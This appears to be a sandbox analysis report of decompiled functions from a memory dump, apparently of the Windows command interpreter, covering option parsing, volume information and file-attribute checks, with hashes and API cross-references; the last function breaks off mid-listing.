Opcode ID: 58525fb7a3dbd8f84f5c63ba71694ee26b9d0ed68e0104e8886e875b5ba230a7
Instruction ID: ffc0784fc51523d908310ea665741f24bd8c1af5686ba5dfc8232b2e88edd2e1
Opcode Fuzzy Hash: 58525fb7a3dbd8f84f5c63ba71694ee26b9d0ed68e0104e8886e875b5ba230a7
Instruction Fuzzy Hash: E351E6316002189AEB2AAB74DC05FAA37FCFF04315F1085AAE855D71A0EF709DC9CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0033C430, Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155
memoryCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E0033C430() {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t21;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t37;
				char _t40;
				void* _t47;
				intOrPtr* _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t65;
				void* _t68;
				void* _t73;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t83;

				_t46 = _t83;
				_push(_t47);
				_push(_t47);
				_v8 =  *((intOrPtr*)(_t83 + 4));
				_t21 =  *0x373cc4;
				if(_t21 == 0) {
					L19:
					_t22 = 0;
				} else {
					if( *((intOrPtr*)(_t21 + 0x14)) >= 0x20) {
						_push(0);
						_push(0x4000271c);
						E0033C5A2(_t47);
						goto L24;
					} else {
						_t50 =  *0x373cb8;
						if(_t50 == 0) {
							_t50 = 0x373ab0;
						}
						_t68 = _t50 + 2;
						do {
							_t25 =  *_t50;
							_t50 = _t50 + 2;
						} while (_t25 != 0);
						_t73 = (_t50 - _t68 >> 1) + 1;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0xc);
						if(_t77 == 0) {
							L24:
							_t22 = 1;
						} else {
							_t53 = HeapAlloc(GetProcessHeap(), 8, _t73 + _t73);
							 *_t77 = _t53;
							if(_t53 == 0) {
								goto L24;
							} else {
								_t31 =  *0x373cb8;
								if( *0x373cb8 == 0) {
									_t31 = 0x373ab0;
								}
								E00341040(_t53, _t73, _t31);
								_t33 = E00343B2C(_t53);
								 *((intOrPtr*)(_t77 + 4)) = _t33;
								if(_t33 == 0) {
									goto L24;
								} else {
									_t54 =  *0x373cc4;
									 *((char*)(_t77 + 8)) =  *0x373cc9;
									 *((char*)(_t77 + 9)) =  *0x373cc8;
									 *((intOrPtr*)(_t54 + 0x90 +  *(_t54 + 0x14) * 4)) = _t77;
									_t37 =  *0x373cd8;
									 *(_t54 + 0x14) =  *(_t54 + 0x14) + 1;
									 *((intOrPtr*)(_t54 + 0xc)) = _t37;
									if( *((intOrPtr*)(_t54 + 0x10)) < _t37) {
										 *((intOrPtr*)(_t54 + 0x10)) = _t37;
									}
									_t78 = E0033EA40( *((intOrPtr*)( *((intOrPtr*)(_t46 + 8)) + 0x3c)), 0, 0);
									_t40 = 0;
									 *0x36b8b0 = 0;
									while( *_t78 != _t40) {
										__imp___wcsicmp(_t78, L"ENABLEEXTENSIONS");
										if(_t40 != 0) {
											__imp___wcsicmp(_t78, L"DISABLEEXTENSIONS");
											if(_t40 == 0) {
												 *0x373cc9 = 0;
												goto L15;
											} else {
												__imp___wcsicmp(_t78, L"ENABLEDELAYEDEXPANSION");
												if(_t40 != 0) {
													__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
													_t65 = _t78;
													if(_t40 != 0) {
														if( *_t78 == 0) {
															goto L15;
														} else {
															_push(0);
															_push(0x400023a6);
															E0033C5A2(_t65);
															_t22 = 1;
															 *0x36b8b0 = 1;
														}
													} else {
														 *0x373cc8 = _t40;
														goto L15;
													}
												} else {
													 *0x373cc8 = 1;
													goto L15;
												}
											}
										} else {
											 *0x373cc9 = 1;
											L15:
											_t78 = E0033D7E6(_t78);
											_t40 = 0;
											continue;
										}
										goto L20;
									}
									goto L19;
								}
							}
						}
					}
				}
				L20:
				return _t22;
			}

0x0033c433
0x0033c435
0x0033c436
0x0033c441
0x0033c447
0x0033c450
0x0033c58c
0x0033c58c
0x0033c456
0x0033c45a
0x0034a90c
0x0034a90e
0x0034a913
0x00000000
0x0033c460
0x0033c460
0x0033c468
0x0034a902
0x0034a902
0x0033c46e
0x0033c473
0x0033c473
0x0033c476
0x0033c479
0x0033c486
0x0033c496
0x0033c49a
0x0034a91a
0x0034a91c
0x0033c4a0
0x0033c4b3
0x0033c4b5
0x0033c4b9
0x00000000
0x0033c4bf
0x0033c4bf
0x0033c4c6
0x0034a922
0x0034a922
0x0033c4cf
0x0033c4d4
0x0033c4d9
0x0033c4de
0x00000000
0x0033c4e4
0x0033c4e4
0x0033c4ef
0x0033c4f7
0x0033c4fd
0x0033c504
0x0033c509
0x0033c50c
0x0033c512
0x0033c514
0x0033c514
0x0033c527
0x0033c529
0x0033c52b
0x0033c56c
0x0033c577
0x0033c581
0x0033c538
0x0033c542
0x0033c59b
0x00000000
0x0033c544
0x0033c54a
0x0033c554
0x0034a932
0x0034a939
0x0034a93c
0x0034a94d
0x00000000
0x0034a953
0x0034a953
0x0034a954
0x0034a959
0x0034a961
0x0034a963
0x0034a963
0x0034a93e
0x0034a93e
0x00000000
0x0034a93e
0x0033c55a
0x0033c55a
0x00000000
0x0033c55a
0x0033c554
0x0033c583
0x0033c583
0x0033c561
0x0033c568
0x0033c56a
0x00000000
0x0033c56a
0x00000000
0x0033c581
0x00000000
0x0033c56c
0x0033c4de
0x0033c4b9
0x0033c49a
0x0033c45a
0x0033c58e
0x0033c596

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 0033C489
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0033C490
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 0033C4A6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0033C4AD
_wcsicmp.MSVCRT ref: 0033C538
_wcsicmp.MSVCRT ref: 0033C54A
_wcsicmp.MSVCRT ref: 0033C577
_wcsicmp.MSVCRT ref: 0034A932

Strings

DISABLEEXTENSIONS, xrefs: 0033C532
ENABLEDELAYEDEXPANSION, xrefs: 0033C544
DISABLEDELAYEDEXPANSION, xrefs: 0034A92C
ENABLEEXTENSIONS, xrefs: 0033C571

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap_wcsicmp$AllocProcess
String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
API String ID: 435930816-3086019870
Opcode ID: aaed01af2aab7b4ae798a4b068eb66053cf55a2366de145c243b56bbe1126f12
Instruction ID: dc8616b49b68f0100a8e3a0983704e8711ec8986d668a548adedca41094a0a2a
Opcode Fuzzy Hash: aaed01af2aab7b4ae798a4b068eb66053cf55a2366de145c243b56bbe1126f12
Instruction Fuzzy Hash: 035148352142029BE727DF39AC81A2737DCEB09710F15856EE84AEB281EB31E941DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0035A834, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0035A834(intOrPtr __ecx, DWORD* __edx) {
				signed int _v8;
				char _v524;
				int _v532;
				char _v536;
				int _v540;
				void _v1060;
				long _v1068;
				char _v1072;
				int _v1076;
				void _v1596;
				int _v1604;
				char _v1608;
				void* _v1612;
				void _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				signed short _v2142;
				long _v2144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr _t98;
				WCHAR* _t102;
				short* _t104;
				WCHAR* _t105;
				DWORD* _t107;
				signed short _t108;
				DWORD* _t120;
				void* _t131;
				WCHAR* _t133;
				short* _t134;
				WCHAR* _t136;
				short* _t138;
				intOrPtr* _t142;
				signed int _t144;
				DWORD* _t146;
				signed int _t148;

				_t141 = __edx;
				_t65 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t65 ^ _t148;
				_v2136 = __ecx;
				_t146 = 0;
				_v1604 = 0x104;
				_v1612 = 0;
				_t120 = 1;
				_t145 = __edx;
				_v1608 = 1;
				memset( &_v2132, 0, 0x104);
				_v1076 = 0;
				_v1072 = 1;
				_v1068 = 0x104;
				memset( &_v1596, 0, 0x104);
				_v540 = 0;
				_v536 = 1;
				_v532 = 0x104;
				memset( &_v1060, 0, 0x104);
				_t122 =  &_v2132;
				if(E00340C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L46:
					_push(_t146);
					_push(8);
					E0033C5A2(_t122);
					_t146 = _t120;
					L47:
					_t120 = _t146;
					L48:
					_t147 = _t120;
					L49:
					__imp__??_V@YAXPAX@Z(_v540);
					__imp__??_V@YAXPAX@Z(_v1076);
					__imp__??_V@YAXPAX@Z();
					return E00346FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
				}
				_t122 =  &_v1596;
				if(E00340C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				_t122 =  &_v1060;
				if(E00340C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				E00340D89(_t141, _t145);
				_t131 = _v1612;
				_t142 = _t131;
				if(_t131 == 0) {
					_t142 =  &_v2132;
				}
				_t145 = _t142 + 2;
				do {
					_t98 =  *_t142;
					_t142 = _t142 + 2;
				} while (_t98 != _t146);
				_t99 = _v540;
				_t144 = _t142 - _t145 >> 1;
				if(_v540 == 0) {
					_t99 =  &_v1060;
				}
				if(_t131 == 0) {
					_t131 =  &_v2132;
				}
				_t141 = _t144 + 1;
				if(E00344C89(_t131, _t144 + 1, _t99, _v532) == 0) {
					goto L47;
				} else {
					E00340CF2(_t141, "\\");
					_t133 = _v1076;
					if(_t133 == 0) {
						_t133 =  &_v1596;
					}
					_t102 = _v540;
					if(_t102 == 0) {
						_t102 =  &_v1060;
					}
					_t141 =  &_v2144;
					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
						_t104 = _v540;
						_t134 = _t104;
						if(_t104 == 0) {
							_t134 =  &_v1060;
						}
						if( *_t134 != 0x5c) {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							 *((short*)(_t104 + 2)) = 0;
							goto L31;
						} else {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							_t138 = _t104;
							while( *_t104 != _t146) {
								_t138 = _t104;
								_t104 = _t104 + 2;
							}
							 *_t138 = 0;
							L31:
							_t105 = _v1076;
							_t136 = _t105;
							if(_t105 == 0) {
								_t136 =  &_v1596;
							}
							if( *_t136 == _t146) {
								_t106 = _v540;
								if(_v540 == 0) {
									_t106 =  &_v1060;
								}
								_t145 = _v2136;
								_t107 = E00357C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
							} else {
								if(_t105 == 0) {
									_t105 =  &_v1596;
								}
								_t137 = _v540;
								if(_v540 == 0) {
									_t137 =  &_v1060;
								}
								_t145 = _v2136;
								_push(_t105);
								_t107 = E00357C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
							}
							_t147 = _t107;
							if(_t107 == 0) {
								_t108 = _v2144;
								if(_t108 != 0 || _v2140 != _t108) {
									_push(_t108 & 0x0000ffff);
									E0034274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
									_t147 = E00357C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
								}
							}
							goto L49;
						}
					} else {
						if(GetLastError() == 0x90) {
							goto L47;
						}
						_push(_t146);
						_push(GetLastError());
						E0033C5A2(_t133);
						goto L48;
					}
				}
			}

0x0035a834
0x0035a83f
0x0035a846
0x0035a851
0x0035a858
0x0035a85a
0x0035a862
0x0035a86e
0x0035a871
0x0035a873
0x0035a879
0x0035a881
0x0035a88c
0x0035a892
0x0035a8a1
0x0035a8a9
0x0035a8b4
0x0035a8ba
0x0035a8c9
0x0035a8d0
0x0035a8f5
0x0035ab2f
0x0035ab2f
0x0035ab30
0x0035ab32
0x0035ab39
0x0035ab3b
0x0035ab3b
0x0035ab3d
0x0035ab3d
0x0035ab3f
0x0035ab45
0x0035ab52
0x0035ab5f
0x0035ab78
0x0035ab78
0x0035a8fd
0x0035a91f
0x00000000
0x00000000
0x0035a927
0x0035a949
0x00000000
0x00000000
0x0035a956
0x0035a95b
0x0035a961
0x0035a965
0x0035a967
0x0035a967
0x0035a96d
0x0035a970
0x0035a970
0x0035a973
0x0035a976
0x0035a97b
0x0035a983
0x0035a987
0x0035a989
0x0035a989
0x0035a991
0x0035a993
0x0035a993
0x0035a99f
0x0035a9a8
0x00000000
0x0035a9ae
0x0035a9b9
0x0035a9be
0x0035a9c6
0x0035a9c8
0x0035a9c8
0x0035a9ce
0x0035a9d6
0x0035a9d8
0x0035a9d8
0x0035a9e2
0x0035a9f9
0x0035aa20
0x0035aa26
0x0035aa2a
0x0035aa2c
0x0035aa2c
0x0035aa36
0x0035aa59
0x0035aa5b
0x0035aa5b
0x0035aa63
0x00000000
0x0035aa38
0x0035aa3a
0x0035aa3c
0x0035aa3c
0x0035aa42
0x0035aa4b
0x0035aa46
0x0035aa48
0x0035aa48
0x0035aa52
0x0035aa67
0x0035aa67
0x0035aa6d
0x0035aa71
0x0035aa73
0x0035aa73
0x0035aa7c
0x0035aab2
0x0035aaba
0x0035aabc
0x0035aabc
0x0035aac2
0x0035aad0
0x0035aa7e
0x0035aa80
0x0035aa82
0x0035aa82
0x0035aa88
0x0035aa90
0x0035aa92
0x0035aa92
0x0035aa98
0x0035aa9e
0x0035aaa8
0x0035aaad
0x0035aad8
0x0035aadc
0x0035aade
0x0035aae6
0x0035aaf3
0x0035ab0d
0x0035ab2b
0x0035ab2b
0x0035aae6
0x00000000
0x0035aadc
0x0035a9fb
0x0035aa06
0x00000000
0x00000000
0x0035aa0c
0x0035aa13
0x0035aa14
0x00000000
0x0035aa1a
0x0035a9f9

APIs

memset.MSVCRT ref: 0035A879
memset.MSVCRT ref: 0035A8A1
memset.MSVCRT ref: 0035A8C9

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,003321E8,?,?,?,-00000105,-00000105,-00000105), ref: 0035A9F1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 0035A9FB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 0035AA0D
??_V@YAXPAX@Z.MSVCRT ref: 0035AB45
??_V@YAXPAX@Z.MSVCRT ref: 0035AB52
??_V@YAXPAX@Z.MSVCRT ref: 0035AB5F

Strings

%04X-%04X, xrefs: 0035AAFC

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ErrorLast$InformationVolume
String ID: %04X-%04X
API String ID: 2748242238-1126166780
Opcode ID: f058b7cf56590cffb5cd6929400b350b96a28f73bdad6111949dcfc05aff609b
Instruction ID: badf03aa2aad413f68d5b1d4afee8c66265e9c786f152671bbbbef6d25aa51db
Opcode Fuzzy Hash: f058b7cf56590cffb5cd6929400b350b96a28f73bdad6111949dcfc05aff609b
Instruction Fuzzy Hash: BE91D4B1A006289BDB26DB24CC85FEA77B9EF54305F4502D9F909E7150EA309F88DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00343121, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00343121(void* __ecx, void* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				long _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				void* _v1100;
				void _v1620;
				long _v1624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				WCHAR* _t64;
				WCHAR* _t84;
				signed int _t86;
				void* _t87;
				WCHAR* _t89;
				WCHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;

				_t109 = __edx;
				_t47 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t47 ^ _t112;
				_v560 = 1;
				_t89 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t111 = __edx;
				_t110 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E00340C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					 *0x373cf0 = 8;
					_t64 = _t89;
					goto L21;
				} else {
					_t79 = _v1100;
					 *0x373cf0 = 0;
					if(_v1100 == 0) {
						_t79 =  &_v1620;
					}
					_t109 = _t111;
					if(E00344C89(_t110, _t111, _t79, _v1092) != 0) {
						_t81 = _v1100;
						if(_v1100 == 0) {
							_t81 =  &_v1620;
						}
						E00340D89(_t109, _t81);
						E00340CF2(_t109, "\\");
						_t102 = _v564;
						if(_t102 == 0) {
							_t102 =  &_v1084;
						}
						_t84 = _v28;
						if(_t84 == 0) {
							_t84 =  &_v548;
						}
						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
							_t86 = GetLastError();
							_t46 = _t86 - 0x90; // -144
							asm("sbb ecx, ecx");
							 *0x373cf0 =  ~_t46 & _t86;
						} else {
							_t87 = _v564;
							if(_t87 == 0) {
								_t87 =  &_v1084;
							}
							__imp___wcsicmp(_t87, L"FAT");
							if(_t87 == 0) {
								if(_v1624 == 0xc) {
									_t64 = 1;
									L21:
									_t89 = _t64;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v1100);
				__imp__??_V@YAXPAX@Z(_v28);
				__imp__??_V@YAXPAX@Z();
				return E00346FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
			}

0x00343121
0x0034312c
0x00343133
0x0034313e
0x00343146
0x00343148
0x00343154
0x0034315c
0x0034315e
0x00343160
0x00343168
0x00343170
0x00343174
0x00343180
0x00343188
0x00343193
0x0034319a
0x003431a9
0x003431d5
0x0034dbf0
0x0034dbfa
0x00000000
0x00343229
0x00343229
0x0034322f
0x00343237
0x00343239
0x00343239
0x00343245
0x00343251
0x00343257
0x0034325f
0x00343261
0x00343261
0x0034326e
0x0034327e
0x00343283
0x0034328b
0x0034dbb6
0x0034dbb6
0x00343291
0x00343296
0x00343310
0x00343310
0x003432b3
0x0034dbd3
0x0034dbd9
0x0034dbe1
0x0034dbe5
0x003432b9
0x003432b9
0x003432c1
0x00343318
0x00343318
0x003432c9
0x003432d3
0x0034dbc8
0x0034dbd0
0x0034dbfc
0x0034dbfc
0x0034dbfc
0x0034dbc8
0x003432d3
0x003432b3
0x00343251
0x003432df
0x003432e9
0x003432f6
0x0034330f

APIs

memset.MSVCRT ref: 00343160
memset.MSVCRT ref: 00343180
memset.MSVCRT ref: 003431A9

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,003321E8,?,?,?,-00000105,-00000105,-00000105), ref: 003432AB
_wcsicmp.MSVCRT ref: 003432C9
??_V@YAXPAX@Z.MSVCRT ref: 003432DF
??_V@YAXPAX@Z.MSVCRT ref: 003432E9
??_V@YAXPAX@Z.MSVCRT ref: 003432F6

Strings

FAT, xrefs: 003432C3

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$InformationVolume_wcsicmp
String ID: FAT
API String ID: 4247940253-238207945
Opcode ID: c003e6a07482ebc2996ebd78ad3b8377af57515e9225a18787feb08d51640da6
Instruction ID: 2f16ff9f489477c53724cd19217b0df0dc42dfb697c127d58b5369ee9d774e65
Opcode Fuzzy Hash: c003e6a07482ebc2996ebd78ad3b8377af57515e9225a18787feb08d51640da6
Instruction Fuzzy Hash: DE5142B1A002199BDB26CBA4DC85BEE77BCEB04344F0405E9E509EB151EB75AF84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0033AD44, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0033AD44(WCHAR* __ecx) {
				signed int _v8;
				void* _v608;
				long _v612;
				char _v616;
				int _v620;
				void* _v624;
				void _v1140;
				WCHAR* _v1144;
				WCHAR* _v1148;
				void* _v1152;
				void* _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				WCHAR* _t45;
				int _t48;
				wchar_t* _t49;
				long _t50;
				intOrPtr* _t51;
				signed int _t57;
				void* _t59;
				void* _t60;
				signed int _t61;
				WCHAR* _t62;
				void* _t78;
				void* _t81;
				signed int _t82;
				WCHAR* _t84;
				void* _t85;
				WCHAR* _t86;
				wchar_t* _t87;
				signed int _t89;
				signed int _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x47c;
				_t32 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t32 ^ _t91;
				_push(_t59);
				_t84 = __ecx;
				_v1144 = __ecx;
				if(__ecx == 0) {
					_t34 = 0;
					L11:
					_pop(_t81);
					_pop(_t85);
					_pop(_t60);
					return E00346FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
				}
				_v616 = 1;
				_t82 = 0;
				_v612 = 0x104;
				_v620 = 0;
				memset( &_v1140, 0, 0x104);
				_t91 = _t91 + 0xc;
				if(E00340C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					__imp__??_V@YAXPAX@Z(_v620);
					_t34 = _t82;
					goto L11;
				}
				_t45 = _v620;
				if(_t45 == 0) {
					_t45 =  &_v1140;
				}
				_t61 = GetFullPathNameW(E003422C0(_t59, _t84), _v612, _t45,  &_v1148);
				if(_t61 == 0) {
					L9:
					_t82 = _t61;
					goto L10;
				} else {
					_t86 = _v620;
					if(_t86 == 0) {
						_t86 =  &_v1140;
					}
					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
					_t91 = _t91 + 0xc;
					if(_t48 == 0) {
						_t62 = _v1144;
						_t87 =  &(_t86[4]);
						_v1148 = _t87;
						_t49 = wcsstr(_t62, _t87);
						_v1148 = _t49;
						if(_t49 == 0 || _t49 <= _t62) {
							_t50 = GetFileAttributesW(_t62);
						} else {
							 *_t49 = 0;
							_t50 = GetFileAttributesW(_t62);
							 *_v1148 =  *_t49 & 0x0000ffff;
						}
						if(_t50 != 0xffffffff) {
							_t82 = _t50;
						}
						goto L10;
					} else {
						_t51 = _v1148;
						if(_t51 == 0 ||  *_t51 == _t82) {
							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
						} else {
							_t79 = _t86;
							_t61 = E003468BA(E00346A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
							E0033CD27( *((intOrPtr*)(_t91 + 0x14)));
							if(_t61 == 0) {
								_t57 = _t86[1] & 0x0000ffff;
								_t78 = 0x5c;
								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
									if(GetDriveTypeW(_t86) > 1) {
										_t61 = 1;
									}
								}
							}
						}
						goto L9;
					}
				}
			}

0x0033ad4c
0x0033ad52
0x0033ad59
0x0033ad60
0x0033ad62
0x0033ad64
0x0033ad6b
0x0033aeac
0x0033ae71
0x0033ae78
0x0033ae79
0x0033ae7a
0x0033ae85
0x0033ae85
0x0033ad76
0x0033ad7f
0x0033ad81
0x0033ad8c
0x0033ad95
0x0033ada0
0x0033adc0
0x0033ae61
0x0033ae68
0x0033ae6f
0x00000000
0x0033ae6f
0x0033adc6
0x0033adcf
0x0035122a
0x0035122a
0x0033adf0
0x0033adf4
0x0033ae5f
0x0033ae5f
0x00000000
0x0033adf6
0x0033adf6
0x0033adff
0x00351233
0x00351233
0x0033ae0d
0x0033ae13
0x0033ae18
0x0035123c
0x00351240
0x00351245
0x00351249
0x0035124f
0x00351257
0x00351276
0x0035125d
0x00351263
0x00351266
0x00351270
0x00351270
0x0035127f
0x00351285
0x00351285
0x00000000
0x0033ae1e
0x0033ae1e
0x0033ae24
0x003512b0
0x0033ae33
0x0033ae37
0x0033ae53
0x0033ae56
0x0033ae5d
0x0033ae86
0x0033ae8c
0x0033ae90
0x00351296
0x0035129e
0x0035129e
0x00351296
0x0033ae90
0x0033ae5d
0x00000000
0x0033ae24
0x0033ae18

APIs

memset.MSVCRT ref: 0033AD95

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 0033ADEA
wcsncmp.MSVCRT(?,\\.\,00000004), ref: 0033AE0D
??_V@YAXPAX@Z.MSVCRT ref: 0033AE68
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 0035128D

Part of subcall function 003422C0: wcschr.MSVCRT ref: 003422CC

wcsstr.MSVCRT ref: 00351249
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00351266
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 003512A5

Part of subcall function 003468BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,00346A00,00346A00,?,0033AE4F,00000037,00000000,?), ref: 003468E6

Part of subcall function 0033CD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00359362,00000000,00000000,?,00349814,00000000), ref: 0033CD55

Strings

\\.\, xrefs: 0033AE07

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
String ID: \\.\
API String ID: 52035941-2900601889
Opcode ID: 7cccad27306476780ae85332e90246d99859afea49551259d59cb6378994994e
Instruction ID: 71433ecab881a450e00f121101f8c2c134f467a80c7ea0d804b673359dc4ea38
Opcode Fuzzy Hash: 7cccad27306476780ae85332e90246d99859afea49551259d59cb6378994994e
Instruction Fuzzy Hash: 4041E0715087019BD7329F649888AABB7ECEF84711F01092EF899C71A1EB70DD48C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 0035AEE5, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0035AEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
				signed int _v8;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				signed char _v125;
				signed int _v132;
				int _v136;
				signed int _v140;
				signed short* _v144;
				void* _v148;
				signed int _v152;
				int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t96;
				signed int _t105;
				void* _t111;
				long _t113;
				void* _t115;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t129;
				signed int _t138;
				void _t142;
				long _t144;
				long _t146;
				signed short* _t154;
				void* _t157;
				signed short _t164;
				signed int _t171;
				signed int _t173;
				signed char _t177;
				signed char _t179;
				long _t180;
				int _t185;
				void* _t188;
				signed int _t191;
				void* _t192;
				void* _t193;
				signed int* _t194;
				int _t197;
				signed short* _t198;
				void* _t199;
				int _t200;
				signed short* _t203;
				intOrPtr _t204;
				signed int _t205;
				void* _t206;

				_t96 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t96 ^ _t205;
				_t154 = __ecx;
